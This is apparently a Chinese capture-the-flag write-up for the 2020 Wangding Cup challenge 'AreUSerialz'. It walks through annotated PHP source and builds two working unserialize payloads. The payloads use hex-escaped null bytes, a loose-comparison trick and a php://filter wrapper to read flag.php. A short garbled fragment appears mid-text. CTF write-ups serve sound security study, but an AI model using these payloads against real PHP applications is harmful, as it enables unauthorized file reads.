[网鼎杯 2020 青龙组]AreUSerialz
打开题目仔细阅读源码
<?php
include("flag.php");
highlight_file(__FILE__); //文件包含,联想到php://filter伪协议读取文件
class FileHandler {
protected $op;//protected保护类,成员可以被自身以及其子类和父类访问
protected $filename;
protected $content;
function __construct() {//构造函数
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
}
else if($this->op == "2") {
$res = $this->read();//弱比较,如果是op=2,运行read函数,并将运行后的结果赋值res,然后将$res放到output函数中
$this->output($res);
}
else {
$this->output("Bad Hacker!");
}
}
private function write() {//private私有类只能自身访问,无法从外部类访问
if(isset($this->filename) && isset($this->content))//判断filname和content是否为空 {
if(strlen((string)$this->content) > 100) {//判断content的长度是否大于100
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);//file_put_contents将一个字符串写入文件
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {//析构函数 该函数会在类的一个对象被删除时自动调用。
if($this->op === "2")//强比较必须相等
$this->op = "1";//将1赋值给op
$this->content = "";//将content至空
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//ord返回()内字符对应的 Unicode 数值
//若s字符数组中有字符的编码值不在32~125则报错
return false;
return true;
}
if(isset($_GET{'str'})) {
//传参str
$str = (string)$_GET['str'];
if(is_valid($str)) {
$obj = unserialize($str);
}
}
思路:构造一个payload去执行read()函数,读取flag.php的内容。
函数绕过:
(1)
o
p
,
op,
op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验
利用大写S采用的16进制,来绕过is_valid中对空字节的检查。 //00 替换 %00 。
(2)强比较和弱比较的利用。将op设置为int型的2,op === "2"为false,op == "2"为true,绕过析构函数中的if判断,同时又可以调用到读文件的流程
于是构造payload
payload:
O%3A11%3A%22FileHandler%22%3A3%3A%7BS%3A5%3A%22\00%2A\00op%22%3Bi%3A2%3BS%3A11%3A%22\00%2A\00filename%22%3BS%3A8%3A%22flag.php%22%3BS%3A10%3A%22\00%2A\00content%22%3BS%3A0%3A%22%22%3B%7D
抓包:
法二:
还有一种简单粗暴的方法
利用public绕过,用伪协议读取
class FileHandler{
public $op=2;
public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
public $content=2;
}
$a = new FileHandler();
echo serialize($a);
payload:
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";i:2;}
php7.1+的新特性,对属性类型不敏感,本地序列化的时候将protected属性改为public进行绕过。
但我不知道师傅们是怎么看出来这道题php版本是7.1+
想了解详情移步:php官网